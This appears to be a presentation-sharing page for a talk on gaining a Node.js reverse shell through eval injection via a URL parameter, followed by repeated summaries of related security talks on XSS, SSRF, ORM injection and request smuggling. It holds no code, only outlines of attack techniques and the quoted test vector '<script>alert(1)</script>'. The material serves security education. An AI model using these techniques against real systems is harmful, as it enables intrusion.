Node JS reverse shell
•
1 like•5,003 views
This document discusses security vulnerabilities in Node.js applications. It begins with an introduction to Node.js and describes how to test for security issues. It then demonstrates a reverse shell vulnerability by injecting JavaScript code through a URL parameter. The document concludes with recommendations to avoid eval and provides references for further Node.js security information.
Report
Share
Report
Share
Download to read offline
Recommended
ORM2Pwn: Exploiting injections in Hibernate ORM
Mikhail Egorov and Sergey Soldatov presented their research on exploiting injections in Hibernate ORM. They demonstrated that while Hibernate Query Language (HQL) is more limited than SQL, it is possible to exploit HQL injections to conduct SQL injections on popular databases like MySQL, PostgreSQL, Oracle, and Microsoft SQL Server. They did this by leveraging features of Hibernate and the databases like how Hibernate handles string escaping and allows unicode characters in identifiers. Their talk provided examples of exploiting each database and a takeaway that Hibernate is not a web application firewall and HQL injections can be used to perform SQL injections.
Attacking thru HTTP Host header
This document discusses exploiting vulnerabilities related to HTTP host header tampering. It notes that tampering with the host header can lead to issues like password reset poisoning, cache poisoning, and cross-site scripting. It provides examples of how normal host header usage can be tampered with, including by spoofing the header to direct traffic to malicious sites. The document also lists some potential victims of host header attacks, like Drupal, Django and Joomla, and recommends developers check settings to restrict allowed hosts. It proposes methods for bruteforcing subdomains and host headers to find vulnerabilities.
ORM Injection
This document discusses ORM injection vulnerabilities using Hibernate and MySQL as an example. It begins with an introduction to injection vulnerabilities and ORM concepts. It then demonstrates how SQL injection is possible by exploiting differences in escaping rules between HQL and MySQL. A proof of concept shows injecting HQL to retrieve all records, and injecting SQL directly by escaping quotes differently. The document concludes that input validation and parameterized queries are needed to prevent ORM injection, and frameworks may not fully prevent injection depending on the underlying database.
Bug Bounty Hunter Methodology - Nullcon 2016
This is a bug bounty hunter presentation given at Nullcon 2016 by Bugcrowd's Faraz Khan.
Learn more about Bugcrowd here: https://bugcrowd.com/join-the-crowd
Top 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities as defined by the OWASP, and what you can do to protect your application
Reverse proxies & Inconsistency
https://2018.zeronights.ru/en/reports/reverse-proxies-inconsistency/
Modern websites are growing more complex with different reverse proxies and balancers covering them. They are used for various purposes: request routing, caching, putting additional headers, restricting access. In other words, reverse proxies must both parse incoming requests and modify them in a particular way. However, path parsing may turn out to be quite a challenge due to mismatches in the parsing of different web servers. Moreover, request converting may imply a wide range of different consequences from a cybersecurity point of view. I have analyzed different reverse proxies with different configurations, the ways they parse requests, apply rules, and perform caching. In this talk, I will both speak about general processes and the intricacies of proxy operation and demonstrate the examples of bypassing restrictions, expanding access to a web application, and new attacks through the web cache deception and cache poisoning.
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed Webinar Slides:
Brief coverage of SQLi and XSS against Web Services to then talk about XXE and XEE attacks and mitigation. Heavily inspired on the "Practical Web Defense" (PWD) style of pwnage + fixing (https://www.elearnsecurity.com/PWD)
Full recording here:
NOTE: (~20 minute) XXE + XEE Demo Recording starts at minute 25
https://www.elearnsecurity.com/collateral/webinar/xxe-exposed/
Ruby on Rails Presentation
Ruby on Rails is a popular web application framework written in Ruby. It follows the model-view-controller (MVC) pattern and includes components like Action Pack, Active Support, Active Record, and Action Mailer. The document provides an overview of Rails, Ruby basics, installing Rails, the directory structure of a Rails application, and the MVC pattern.
Recommended
ORM2Pwn: Exploiting injections in Hibernate ORM
Mikhail Egorov and Sergey Soldatov presented their research on exploiting injections in Hibernate ORM. They demonstrated that while Hibernate Query Language (HQL) is more limited than SQL, it is possible to exploit HQL injections to conduct SQL injections on popular databases like MySQL, PostgreSQL, Oracle, and Microsoft SQL Server. They did this by leveraging features of Hibernate and the databases like how Hibernate handles string escaping and allows unicode characters in identifiers. Their talk provided examples of exploiting each database and a takeaway that Hibernate is not a web application firewall and HQL injections can be used to perform SQL injections.
Attacking thru HTTP Host header
This document discusses exploiting vulnerabilities related to HTTP host header tampering. It notes that tampering with the host header can lead to issues like password reset poisoning, cache poisoning, and cross-site scripting. It provides examples of how normal host header usage can be tampered with, including by spoofing the header to direct traffic to malicious sites. The document also lists some potential victims of host header attacks, like Drupal, Django and Joomla, and recommends developers check settings to restrict allowed hosts. It proposes methods for bruteforcing subdomains and host headers to find vulnerabilities.
ORM Injection
This document discusses ORM injection vulnerabilities using Hibernate and MySQL as an example. It begins with an introduction to injection vulnerabilities and ORM concepts. It then demonstrates how SQL injection is possible by exploiting differences in escaping rules between HQL and MySQL. A proof of concept shows injecting HQL to retrieve all records, and injecting SQL directly by escaping quotes differently. The document concludes that input validation and parameterized queries are needed to prevent ORM injection, and frameworks may not fully prevent injection depending on the underlying database.
Bug Bounty Hunter Methodology - Nullcon 2016
This is a bug bounty hunter presentation given at Nullcon 2016 by Bugcrowd's Faraz Khan.
Learn more about Bugcrowd here: https://bugcrowd.com/join-the-crowd
Top 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities as defined by the OWASP, and what you can do to protect your application
Reverse proxies & Inconsistency
https://2018.zeronights.ru/en/reports/reverse-proxies-inconsistency/
Modern websites are growing more complex with different reverse proxies and balancers covering them. They are used for various purposes: request routing, caching, putting additional headers, restricting access. In other words, reverse proxies must both parse incoming requests and modify them in a particular way. However, path parsing may turn out to be quite a challenge due to mismatches in the parsing of different web servers. Moreover, request converting may imply a wide range of different consequences from a cybersecurity point of view. I have analyzed different reverse proxies with different configurations, the ways they parse requests, apply rules, and perform caching. In this talk, I will both speak about general processes and the intricacies of proxy operation and demonstrate the examples of bypassing restrictions, expanding access to a web application, and new attacks through the web cache deception and cache poisoning.
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed Webinar Slides:
Brief coverage of SQLi and XSS against Web Services to then talk about XXE and XEE attacks and mitigation. Heavily inspired on the "Practical Web Defense" (PWD) style of pwnage + fixing (https://www.elearnsecurity.com/PWD)
Full recording here:
NOTE: (~20 minute) XXE + XEE Demo Recording starts at minute 25
https://www.elearnsecurity.com/collateral/webinar/xxe-exposed/
Ruby on Rails Presentation
Ruby on Rails is a popular web application framework written in Ruby. It follows the model-view-controller (MVC) pattern and includes components like Action Pack, Active Support, Active Record, and Action Mailer. The document provides an overview of Rails, Ruby basics, installing Rails, the directory structure of a Rails application, and the MVC pattern.
Building Advanced XSS Vectors
XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built and more complex payloads to evade filters and WAFs. In these slides, cool techniques to bypass them are described, from HTML to javascript. See also http://brutelogic.com.br/blog
Talking About SSRF,CRLF
The document discusses CRLF injection and SSRF vulnerabilities. CRLF injection occurs when user input is directly parsed into response headers without sanitization, allowing special characters to be injected. SSRF is when a server is induced to make HTTP requests to domains of an attacker's choosing, potentially escalating access. Mitigations include sanitizing user input, implementing whitelists for allowed domains/protocols, and input validation.
Bug Bounty - Play For Money
This document provides an overview of bug bounty hunting. It discusses:
- What bug bounty programs are and how they work
- A brief history of major bug bounty programs from the 1990s to present day
- Reasons to participate in bug bounty hunting like money, career opportunities, and enjoyment
- Popular bug bounty platforms and programs
- How to get started with the process of bug hunting
- Tips for writing bug reports that document the issue and steps to reproduce it
- Examples of past bug bounty finds, like an SVG XSS filter bypass and a tapjacking proof of concept
XSS
About XSS security, their impact on PHP applications. Some examples of xss attacks. Solution for xss attacks.
Ethical Hacking
This document provides an overview of ethical hacking. It begins with an abstract that defines ethical hacking as assessing security vulnerabilities to improve protection. It then covers key topics like categories of hackers (white hat, black hat, grey hat), penetration testing, the methodology of an ethical hacker, and common hacking tools. The document emphasizes that ethical hacking tests systems with authorization to identify weaknesses before criminals can exploit them. It provides definitions and explanations of core concepts in ethical hacking to outline this growing field of security assessment.
hacking with node.JS
Node.js is an exciting new platform developed by Ryan Dahl that allows JavaScript developers to create extremely high performance servers by leveraging Google's V8 JavaScript engine and asynchronous I/O. It uses a non-blocking I/O model that makes it lightweight and efficient, as well as features like CommonJS modules and the npm package manager. The document provides examples of building simple HTTP servers and modules in Node.js to demonstrate its capabilities.
Time-Based Blind SQL Injection
This presentation was given at the November 2012 chapter meeting of the Memphis ISSA. In the presentation, I discuss various methods of exploiting common SQL Injection vulnerabilities, as well as present a specialized technique known as Time-Based Blind SQL Injection. Related to the latter, I give a scenario in which other common forms of SQL Injection would fail to produce results for a penetration tester or attacker, and show how one may overcome this situation by using the specialized technique. The scenario given, along with the sample code, is NOT a contrived example, but instead is closely based on a real-world application that I encountered as part of an assessment.
A live demonstration of the common forms of SQL Injection was also given which utilized the OWASP Broken Web Apps VM, DVWA, Burp Proxy and SQL Power Injector. To demo a real-world time-based blind injection, I created and locally hosted a new application which closely mimicked the real-world application mentioned above.
HTTP Request Smuggling via higher HTTP versions
This document summarizes HTTP request smuggling vulnerabilities. It explains how an attacker can craft a single HTTP request that is parsed differently by the frontend and backend servers, allowing the backend to interpret additional hidden requests. Several exploitation techniques and detection methods are described, including issues that can arise with HTTP/1, HTTP/2, and protocols like WebSockets. Automated testing tools have been developed but further research is still needed to fully understand and prevent these attacks.
Web Application Security and Awareness
Secure web programming plus end users' awareness are the last line of defense against attacks targeted at the corporate systems, particularly web applications, in the era of world-wide web.
Most web application attacks occur through Cross Site Scripting (XSS), and SQL Injection. On the other hand, most web application vulnerabilities arise from weak coding with failure to properly validate users' input, and failure to properly sanitize output while displaying the data to the visitors.
The literature also confirms the following web application weaknesses in 2010: 26% improper output handling, 22% improper input handling, and 15% insufficient authentication, and others.
Abdul Rahman Sherzad, lecturer at Computer Science Faculty of Herat University, and Ph.D. student at Technical University of Berlin gave a presentation at 12th IT conference on Higher Education for Afghanistan in MoHE, and then conducted a seminar at Hariwa Institute of Higher Education in Herat, Afghanistan introducing web application security threats by demonstrating the security problems that exist in corporate systems with a strong emphasis on secure development. Major security vulnerabilities, secure design and coding best practices when designing and developing web-based applications were covered.
The main objective of the presentation was raising awareness about the problems that might occur in web-application systems, as well as secure coding practices and principles. The presentation's aims were to build security awareness for web applications, to discuss the threat landscape and the controls users should use during the software development lifecycle, to introduce attack methods, to discuss approaches for discovering security vulnerabilities, and finally to discuss the basics of secure web development techniques and principles.
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
Frans Rosén has reported hundreds of security issues using his big white hat since 2012. He have recieved the biggest bounty ever paid on HackerOne, and is one of the highest ranked bug bounty researchers of all time. He's been bug bounty hunting with an iPhone in Thailand, in a penthouse suite in Las Vegas and without even being present using automation. He'll share his stories about how to act when a company's CISO is screaming "SH******T F*CK" in a phone call 02:30 a Friday night, what to do when companies are sending him money without any reason and why Doctors without Borders are trying to hunt him down.
Pwning mobile apps without root or jailbreak
With the big delays in the time it takes until an iOS jailbreak is public and stable, it is often not possible to test mobile apps in the latest iOS version. Occasionally customers might also provide builds that only work in iOS versions for which no jailbreak is available. On Android the situation is better, but there can also be problems to root certain phone models. These trends make security testing of mobile apps difficult. This talk will cover approaches to defeat common security mechanisms that must be bypassed in the absence of root/jailbreak.
Secure Code Warrior - Remote file inclusion
OWASP Web App Top 10 - Slidepack on "Remote File Inclusion" by Secure Code Warrior Limited and licensed under CC BY-ND 4.0
RoR (Ruby on Rails)
Ruby on Rails presentation by Janis Caune!
Rubi is dynamic, reflective, object-oriented general purpose programming language.
Bug bounty
This document discusses bug bounty programs (BBPs), which reward security researchers for responsibly disclosing software vulnerabilities. It introduces BBPs, noting they save companies money while improving security. Major companies like Google and Facebook run BBPs. The document outlines prerequisites for BBPs like learning security testing techniques. It provides tips for finding vulnerabilities like understanding a site's scope, tools, and avoiding duplicate reports. Common vulnerability types in BBPs include injection flaws and insecure data storage.
Hacking and Defending APIs - Red and Blue make Purple.pdf
The document provides an overview of attacking and defending APIs. It discusses why APIs are attractive targets for attackers, such as the valuable data they provide. It then covers various techniques attackers use to discover, learn about, and exploit APIs, such as reconnaissance, discovery, and different types of active attacks. The document also discusses defenses, noting the importance of having visibility into API traffic and understanding normal behavior to detect attacks. It focuses on the OWASP API Top 10 risks and provides examples of how attackers may exploit each risk.
SSRF For Bug Bounties
The document discusses Server Side Request Forgery (SSRF), including what it is, different types (blind and basic), ways to exploit it like bypassing filters and chaining vulnerabilities, tools that can be used for detection, and two case studies of SSRF vulnerabilities found in the wild. The first case involves using an SSRF to retrieve internal data and then storing malicious HTML in a generated PDF. The second case was an unauthenticated blind SSRF in a Jira OAuth authorization controller that was exploited through a malicious Host header.
Spring boot Introduction
Welcome to presentation on Spring boot which is really great and relatively a new project from Spring.io. Its aim is to simplify creating new spring framework based projects and unify their configurations by applying some conventions. This convention over configuration is already successfully applied in so called modern web based frameworks like Grails, Django, Play framework, Rails etc.
Ruby on Rails Penetration Testing
This document discusses breaking and penetration testing Ruby on Rails applications. It covers fingerprinting the Rails framework, testing the attack surface through routes, session security issues, authentication vulnerabilities, authorization testing, CSRF protection bypass, model attribute assignment and SQL injection issues, view rendering exploits, and insecure defaults. Recommended tools for analysis include Brakeman, grep searches, and the Ruby Mechanize and Nokogiri libraries. The document provides references for further Rails security best practices.
The Security Code Review Guide
Is your code secure? Do you know what are the practices in secure code review? In this talk you will see the important aspects of the various controls to build a reference when conducting secure code reviews in PHP.
Pwning with XSS: from alert() to reverse shell: Defcon Banglore 2013
This document discusses using a web shell proxy to serve malicious JavaScript files to victims attempting to access legitimate sites like Facebook.com, exploiting cross-site scripting (XSS) vulnerabilities without the need to directly hack the target sites' servers. The proxy intercepts requests and responds with payloads that can then attack the victims.
Null Bangalore Meet 18/03/17
The document discusses security through isolation techniques like sandboxes, containers, and virtual machines. It explains that containers provide isolated execution environments using cgroups and namespaces to share the host operating system kernel. Common container platforms are LXC and Docker. Sandboxing tools like Firejail further isolate applications. While containers and virtual machines offer isolation, physical separation provides the highest security since even air-gapped systems can be compromised through side-channel attacks exploiting components like fans, LEDs, or microphones. QubesOS and Proxmox are mentioned as tools that support isolation through virtual machines.
More Related Content
What's hot
Building Advanced XSS Vectors
XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built and more complex payloads to evade filters and WAFs. In these slides, cool techniques to bypass them are described, from HTML to javascript. See also http://brutelogic.com.br/blog
Talking About SSRF,CRLF
The document discusses CRLF injection and SSRF vulnerabilities. CRLF injection occurs when user input is directly parsed into response headers without sanitization, allowing special characters to be injected. SSRF is when a server is induced to make HTTP requests to domains of an attacker's choosing, potentially escalating access. Mitigations include sanitizing user input, implementing whitelists for allowed domains/protocols, and input validation.
Bug Bounty - Play For Money
This document provides an overview of bug bounty hunting. It discusses:
- What bug bounty programs are and how they work
- A brief history of major bug bounty programs from the 1990s to present day
- Reasons to participate in bug bounty hunting like money, career opportunities, and enjoyment
- Popular bug bounty platforms and programs
- How to get started with the process of bug hunting
- Tips for writing bug reports that document the issue and steps to reproduce it
- Examples of past bug bounty finds, like an SVG XSS filter bypass and a tapjacking proof of concept
XSS
About XSS security, their impact on PHP applications. Some examples of xss attacks. Solution for xss attacks.
Ethical Hacking
This document provides an overview of ethical hacking. It begins with an abstract that defines ethical hacking as assessing security vulnerabilities to improve protection. It then covers key topics like categories of hackers (white hat, black hat, grey hat), penetration testing, the methodology of an ethical hacker, and common hacking tools. The document emphasizes that ethical hacking tests systems with authorization to identify weaknesses before criminals can exploit them. It provides definitions and explanations of core concepts in ethical hacking to outline this growing field of security assessment.
hacking with node.JS
Node.js is an exciting new platform developed by Ryan Dahl that allows JavaScript developers to create extremely high performance servers by leveraging Google's V8 JavaScript engine and asynchronous I/O. It uses a non-blocking I/O model that makes it lightweight and efficient, as well as features like CommonJS modules and the npm package manager. The document provides examples of building simple HTTP servers and modules in Node.js to demonstrate its capabilities.
Time-Based Blind SQL Injection
This presentation was given at the November 2012 chapter meeting of the Memphis ISSA. In the presentation, I discuss various methods of exploiting common SQL Injection vulnerabilities, as well as present a specialized technique known as Time-Based Blind SQL Injection. Related to the latter, I give a scenario in which other common forms of SQL Injection would fail to produce results for a penetration tester or attacker, and show how one may overcome this situation by using the specialized technique. The scenario given, along with the sample code, is NOT a contrived example, but instead is closely based on a real-world application that I encountered as part of an assessment.
A live demonstration of the common forms of SQL Injection was also given which utilized the OWASP Broken Web Apps VM, DVWA, Burp Proxy and SQL Power Injector. To demo a real-world time-based blind injection, I created and locally hosted a new application which closely mimicked the real-world application mentioned above.
HTTP Request Smuggling via higher HTTP versions
This document summarizes HTTP request smuggling vulnerabilities. It explains how an attacker can craft a single HTTP request that is parsed differently by the frontend and backend servers, allowing the backend to interpret additional hidden requests. Several exploitation techniques and detection methods are described, including issues that can arise with HTTP/1, HTTP/2, and protocols like WebSockets. Automated testing tools have been developed but further research is still needed to fully understand and prevent these attacks.
Web Application Security and Awareness
Secure web programming plus end users' awareness are the last line of defense against attacks targeted at the corporate systems, particularly web applications, in the era of world-wide web.
Most web application attacks occur through Cross Site Scripting (XSS), and SQL Injection. On the other hand, most web application vulnerabilities arise from weak coding with failure to properly validate users' input, and failure to properly sanitize output while displaying the data to the visitors.
The literature also confirms the following web application weaknesses in 2010: 26% improper output handling, 22% improper input handling, and 15% insufficient authentication, and others.
Abdul Rahman Sherzad, lecturer at Computer Science Faculty of Herat University, and Ph.D. student at Technical University of Berlin gave a presentation at 12th IT conference on Higher Education for Afghanistan in MoHE, and then conducted a seminar at Hariwa Institute of Higher Education in Herat, Afghanistan introducing web application security threats by demonstrating the security problems that exist in corporate systems with a strong emphasis on secure development. Major security vulnerabilities, secure design and coding best practices when designing and developing web-based applications were covered.
The main objective of the presentation was raising awareness about the problems that might occur in web-application systems, as well as secure coding practices and principles. The presentation's aims were to build security awareness for web applications, to discuss the threat landscape and the controls users should use during the software development lifecycle, to introduce attack methods, to discuss approaches for discovering security vulnerabilities, and finally to discuss the basics of secure web development techniques and principles.
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
Frans Rosén has reported hundreds of security issues using his big white hat since 2012. He have recieved the biggest bounty ever paid on HackerOne, and is one of the highest ranked bug bounty researchers of all time. He's been bug bounty hunting with an iPhone in Thailand, in a penthouse suite in Las Vegas and without even being present using automation. He'll share his stories about how to act when a company's CISO is screaming "SH******T F*CK" in a phone call 02:30 a Friday night, what to do when companies are sending him money without any reason and why Doctors without Borders are trying to hunt him down.
Pwning mobile apps without root or jailbreak
With the big delays in the time it takes until an iOS jailbreak is public and stable, it is often not possible to test mobile apps in the latest iOS version. Occasionally customers might also provide builds that only work in iOS versions for which no jailbreak is available. On Android the situation is better, but there can also be problems to root certain phone models. These trends make security testing of mobile apps difficult. This talk will cover approaches to defeat common security mechanisms that must be bypassed in the absence of root/jailbreak.
Secure Code Warrior - Remote file inclusion
OWASP Web App Top 10 - Slidepack on "Remote File Inclusion" by Secure Code Warrior Limited and licensed under CC BY-ND 4.0
RoR (Ruby on Rails)
Ruby on Rails presentation by Janis Caune!
Rubi is dynamic, reflective, object-oriented general purpose programming language.
Bug bounty
This document discusses bug bounty programs (BBPs), which reward security researchers for responsibly disclosing software vulnerabilities. It introduces BBPs, noting they save companies money while improving security. Major companies like Google and Facebook run BBPs. The document outlines prerequisites for BBPs like learning security testing techniques. It provides tips for finding vulnerabilities like understanding a site's scope, tools, and avoiding duplicate reports. Common vulnerability types in BBPs include injection flaws and insecure data storage.
Hacking and Defending APIs - Red and Blue make Purple.pdf
The document provides an overview of attacking and defending APIs. It discusses why APIs are attractive targets for attackers, such as the valuable data they provide. It then covers various techniques attackers use to discover, learn about, and exploit APIs, such as reconnaissance, discovery, and different types of active attacks. The document also discusses defenses, noting the importance of having visibility into API traffic and understanding normal behavior to detect attacks. It focuses on the OWASP API Top 10 risks and provides examples of how attackers may exploit each risk.
SSRF For Bug Bounties
The document discusses Server Side Request Forgery (SSRF), including what it is, different types (blind and basic), ways to exploit it like bypassing filters and chaining vulnerabilities, tools that can be used for detection, and two case studies of SSRF vulnerabilities found in the wild. The first case involves using an SSRF to retrieve internal data and then storing malicious HTML in a generated PDF. The second case was an unauthenticated blind SSRF in a Jira OAuth authorization controller that was exploited through a malicious Host header.
Spring boot Introduction
Welcome to presentation on Spring boot which is really great and relatively a new project from Spring.io. Its aim is to simplify creating new spring framework based projects and unify their configurations by applying some conventions. This convention over configuration is already successfully applied in so called modern web based frameworks like Grails, Django, Play framework, Rails etc.
Ruby on Rails Penetration Testing
This document discusses breaking and penetration testing Ruby on Rails applications. It covers fingerprinting the Rails framework, testing the attack surface through routes, session security issues, authentication vulnerabilities, authorization testing, CSRF protection bypass, model attribute assignment and SQL injection issues, view rendering exploits, and insecure defaults. Recommended tools for analysis include Brakeman, grep searches, and the Ruby Mechanize and Nokogiri libraries. The document provides references for further Rails security best practices.
The Security Code Review Guide
Is your code secure? Do you know what are the practices in secure code review? In this talk you will see the important aspects of the various controls to build a reference when conducting secure code reviews in PHP.
What's hot (20)
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
Hacking and Defending APIs - Red and Blue make Purple.pdf
Hacking and Defending APIs - Red and Blue make Purple.pdf
Viewers also liked
Pwning with XSS: from alert() to reverse shell: Defcon Banglore 2013
This document discusses using a web shell proxy to serve malicious JavaScript files to victims attempting to access legitimate sites like Facebook.com, exploiting cross-site scripting (XSS) vulnerabilities without the need to directly hack the target sites' servers. The proxy intercepts requests and responds with payloads that can then attack the victims.
Null Bangalore Meet 18/03/17
The document discusses security through isolation techniques like sandboxes, containers, and virtual machines. It explains that containers provide isolated execution environments using cgroups and namespaces to share the host operating system kernel. Common container platforms are LXC and Docker. Sandboxing tools like Firejail further isolate applications. While containers and virtual machines offer isolation, physical separation provides the highest security since even air-gapped systems can be compromised through side-channel attacks exploiting components like fans, LEDs, or microphones. QubesOS and Proxmox are mentioned as tools that support isolation through virtual machines.
When you don't have 0days: client-side exploitation for the masses
Conference: InsomniHack (21 March 2014)
Talk speakers:
Michele Orru (@antisnatchor)
Krzysztof Kotowicz (@kkotowicz)
Talk abstract:
A bag of fresh and juicy 0days is certainly something you would love to get
as a Christmas present, but it would probably be just a dream you had one of those drunken nights.
Hold on! Not all is lost! There is still hope for pwning targets without 0days.
We will walk you through multiple real-life examples of client-side pwnage, from tricking the victim to take the bait, to achieving persistence on the compromised system.
The talk will be highly practical and will demonstrate how you can do proper client-side exploitation effectively, simply by abusing existing functionalities of browsers, extensions, legacy features, etc.
We'll delve into Chrome and Firefox extensions (automating various repetitive actions that you'll likely perform in your engagements), HTML applications, abusing User Interface expectations, (Open)Office macros and more. All the attacks are supposed to work on fully patched target software, with a bit of magic trickery as the secret ingredient.
You might already know some of these exploitation vectors, but you might need a way to automate your attacks and tailor them based on the victim language, browser, and whatnot. Either way, if you like offensive security, then this talk is for you.
DevSecCon Asia 2017 Ofer Maor: AppSec DevOps automation – real world cases
This document summarizes two real world cases where companies implemented security automation to help address challenges of securing applications in agile development environments. The first case involved an insurance company transitioning to DevOps and agility, where integrated automated testing helped provide security visibility and training. The second case involved a retailer with an established agile shop where a process-driven security workflow was created to integrate testing into their DevOps pipeline on a weekly basis. Both cases aimed to balance rapid development needs with continuous security.
DevSecCon Asia 2017 Shannon Lietz: Security is Shifting Left
The document discusses the concept of DevSecOps, which involves taking a holistic approach to shift security left in the software development process. It involves collaboration between developers, operations, and security teams. DevSecOps aims to build security and compliance into software development from the beginning through processes and tools. The document provides examples of how DevSecOps operates and is organized, the skills required, challenges to adoption, and emphasizes the importance of experimentation. It argues that with everyone participating in DevSecOps, safer software can be developed sooner.
Cloud Security Essentials 2.0 at RSA
Enabling security at speed and scale requires building security as code which is often provided by software defined networks. The cloud offers software defined networks and some challenges to enabling safe workloads.
DevSecCon KeyNote London 2015
This document discusses the evolution of security practices to enable secure innovation at speed and scale through a DevSecOps approach. It outlines how traditional security controls can be transformed into self-aware, self-reporting components that integrate seamlessly into the DevOps pipeline. Specific examples are provided for how perimeter testing, configuration management, encrypting sensitive data, access management, and multi-factor authentication can move from annual certifications to continuous monitoring and enforcement. The document advocates for collaboration, experimentation, and a focus on simplicity and automation to evolve security practices for DevOps.
Viewers also liked (7)
Pwning with XSS: from alert() to reverse shell: Defcon Banglore 2013
Pwning with XSS: from alert() to reverse shell: Defcon Banglore 2013
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the masses
DevSecCon Asia 2017 Ofer Maor: AppSec DevOps automation – real world cases
DevSecCon Asia 2017 Ofer Maor: AppSec DevOps automation – real world cases
DevSecCon Asia 2017 Shannon Lietz: Security is Shifting Left
DevSecCon Asia 2017 Shannon Lietz: Security is Shifting Left
Similar to Node JS reverse shell
Nodejs
The document provides an introduction to Node.js, a JavaScript runtime environment for server-side development. It discusses how Node.js uses non-blocking I/O and event loops to handle concurrent connections efficiently. Examples are given demonstrating how to build basic HTTP and TCP servers in just a few lines of JavaScript code. Common use cases for Node.js include real-time applications and static file serving.
Node js
Node.js is an asynchronous event-driven JavaScript runtime that uses non-blocking I/O to build scalable network applications. It allows for the creation of web servers and networking tools using a event-driven, non-blocking I/O model rather than the traditional threaded model. Node.js is popular because it uses JavaScript and allows code reuse on both the server-side and client-side, offers high performance and scalability for real-time applications, and has a large passionate community supporting its use.
Nodejs
Node.js is a JavaScript runtime built on Chrome's V8 JavaScript engine. It allows JavaScript to be used for server-side scripting, enabling developers to write scalable network applications using JavaScript. Some key features of Node.js include non-blocking I/O calls, asynchronous programming, and an event loop that handles concurrency. Popular uses of Node.js include real-time web applications with websockets, fast file uploads, and any application requiring real-time data processing.
Node.js on Azure
Sasha Goldshtein's talk about Node.js on Azure, including express, nstore, SQL Azure, MongoDB, Azure VMs, and more...
Node js Introduction
Node.js is an open source JavaScript runtime environment used to build real-time web applications. The document introduces Node.js, the npm package manager, the Express web application framework, and how to connect a Node.js application to MongoDB. Key points covered include Node.js being single-threaded and event-driven, using npm to install and use packages locally or globally, Express providing features for building web apps and APIs, and using modules like Mongoose to connect a Node app to MongoDB.
Why Nodejs Guilin Shanghai
Node.js is a JavaScript runtime built on Chrome's V8 JavaScript engine. It uses an event-driven, non-blocking I/O model that makes it lightweight and efficient, especially for real-time web applications with many concurrent connections. The document discusses why Node.js uses an asynchronous and non-blocking model, why JavaScript was chosen as the language, and why the V8 engine is fast. It also explains why Node.js is threadless and memory efficient. Finally, it notes that the Node.js community is very active and creative.
Why Node.js
Node.js is a JavaScript runtime built on Chrome's V8 JavaScript engine. It uses an event-driven, non-blocking I/O model that makes it lightweight and efficient, especially for real-time web applications with many concurrent connections. The document discusses why Node.js uses an asynchronous and non-blocking model, why JavaScript was chosen as the language, and why the V8 engine is fast. It also explains why Node.js is threadless and memory efficient. Finally, it notes that the Node.js community is very active and creative.
Introduction to Node.js
Basics of Node.js and where it is being used currently. Some introductory examples are also included in the presentation to get started.
Node.js vs Play Framework
Video: https://www.youtube.com/watch?v=b6yLwvNSDck
Here's the showdown you've been waiting for: Node.js vs Play Framework. Both are popular open source web frameworks that are built for developer productivity, asynchronous I/O, and the real time web. But which one is easier to learn, test, deploy, debug, and scale? Should you pick Javascript or Scala? The Google v8 engine or the JVM? NPM or Ivy? Grunt or SBT? Two frameworks enter, one framework leaves.
This is the English version of the presentation. For the version with Japanese subtitles, see http://www.slideshare.net/brikis98/nodejs-vs-play-framework-with-japanese-subtitles
Node J pdf.docx
Node.js is a JavaScript runtime built on Chrome's V8 engine that allows JavaScript to run on the server side. It is popular for building web servers and APIs due to its asynchronous and event-driven nature which allows non-blocking I/O operations. This allows Node.js to handle many concurrent connections efficiently using a single-threaded model. While both Node.js and browsers use JavaScript, they have different ecosystems - Node.js provides access to the filesystem and requires no DOM while browsers provide the DOM and other web APIs but have limited filesystem access. The V8 engine powers both Node.js and Chrome and is continuously optimized for performance. Node.js supports the latest ECMAScript standards without needing to wait for
Node J pdf.docx
Node.js is a JavaScript runtime built on Chrome's V8 engine that allows JavaScript to run on the server side. It is popular for building web servers and networking applications. The document provides an overview of Node.js, how to install it, differences from the browser, the V8 engine, an example app, and an introduction to NPM - the package manager for Node.js projects. NPM is used to install dependencies, update packages, and define scripts to run tasks like building assets or starting servers.
Node.js 1, 2, 3
Node.js is a server-side JavaScript platform for building scalable network applications. It allows writing code using JavaScript for non-browser environments like servers. Node.js uses an event-driven, asynchronous I/O model that makes it lightweight and efficient. A simple web server can be written in just a few lines of Node.js code. Node.js has a thriving ecosystem of external modules that help build full-stack JavaScript applications.
Node.js Web Development .pdf
Web development with Node.js, Fifth Edition
The most popular server-side web development platform is Node.js, which enables programmers to utilize the same tools and paradigms for both server-side and client-side applications. This revised fifth edition of Node.js Web Development walks you through current ideas, methods, and best practices for utilizing Node.js while concentrating on the new capabilities of Node.js 14, Express 4.x, and ECMAScript.
He book begins by guiding you through the fundamental ideas of creating server-side web applications with Node.js. You'll discover how to create a full-featured Node.js web application with a backend database tier to enable you to experiment with various databases. Terraform and Docker Swarm will be used to deploy the program to actual web servers, such as a cloud hosting infrastructure based on AWS EC2, while integrating additional technologies.
As you advance, you'll learn about functional and unit testing as well as using Docker to install test infrastructure. Finally, you'll learn how to implement a variety of app security measures using best practices, tighten the security of Node.js apps, provision HTTPS using Let's Encrypt, and more. The book will assist you in applying your knowledge across the complete life cycle of designing a web app with each chapter. You will have obtained useful Node.js web development expertise by the end of this book, and you will be able to create and deploy your own applications using a public web hosting service.
What Node.js is
Every frontend web developer has access to JavaScript, making it a tremendously popular programming language that has gained the stigma of being used just for client-side code in web pages. Given that you choose to read this book, there's a good chance you've heard of Node.js, a framework for writing JavaScript code outside of web browsers. Node.js, which has been around for ten years, is now a well-established programming environment that is utilized in numerous initiatives of various sizes.
You will learn about Node.js in this book. You will have gained knowledge of every stage of creating server-side web applications using Node.js by the time you finish this book, from conception to deployment and security. In writing this book, we made the following assumptions:
• You are already proficient in writing software.
• You are knowledgeable about JavaScript.
• You have some experience creating web applications in several languages.
